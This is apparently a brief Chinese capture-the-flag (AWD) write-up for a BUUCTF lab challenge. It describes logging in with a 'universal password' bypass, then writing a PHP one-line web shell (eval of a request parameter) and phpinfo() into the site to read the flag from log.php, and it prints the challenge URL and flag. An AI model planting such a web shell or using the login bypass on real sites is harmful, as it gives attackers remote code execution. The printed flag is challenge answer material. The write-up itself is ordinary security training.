AWD-Test2

1.已知账号密码,可SSH连接进行代码审计。

2.登录可万能密码 进入,也可注册 后登录。

3.修改url参数,发现报错。确定为Linux系统

4.写入一句话,并提交。(也可以文件上传,这里采用简洁的方法)

复制代码
<?php phpinfo();?>   //写入这个,在日志log.php可查看flag
<?php eval($_REQUEST[123]);?>

5.访问log.php日志文件,发现里面有flag

复制代码
http://efbc89f9-f04d-4204-b60b-65777640d4ef.node5.buuoj.cn:81/log.php

flag{399aa672-cf2d-4aca-9bec-693be96a9083}

注:如果没有,可以在前面一句话处填写 <?php phpinfo();?> 并提交。

相关推荐
SJLoveIT3 分钟前
sql注入攻击的防御思路总结
数据库·sql
满栀5854 分钟前
jQuery 递归渲染多级树形菜单
前端·javascript·jquery
闲蛋小超人笑嘻嘻6 分钟前
Flexbox 属性总结
前端·css
久违 °8 分钟前
【安全开发】Nmap端口发现技术详解(一)
安全·网络安全
TOPGUS9 分钟前
谷歌将移除部分搜索功能:面对AI时代的一次功能精简策略
前端·人工智能·搜索引擎·aigc·seo·数字营销
运筹vivo@18 分钟前
攻防世界: ics-05
前端·web安全·php
不思念一个荒废的名字22 分钟前
【黑马JavaWeb+AI知识梳理】Web前端开发 - Vue3 / ElementPlus
前端
月明长歌24 分钟前
Selenium中隐式等待(Implicit Wait)和显式等待(Explicit Wait)的区别
前端·javascript·selenium
姜太小白26 分钟前
【前端】JavaScript字符串执行方法总结
开发语言·前端·javascript
GIS之路33 分钟前
GDAL 实现影像合并
前端·python·信息可视化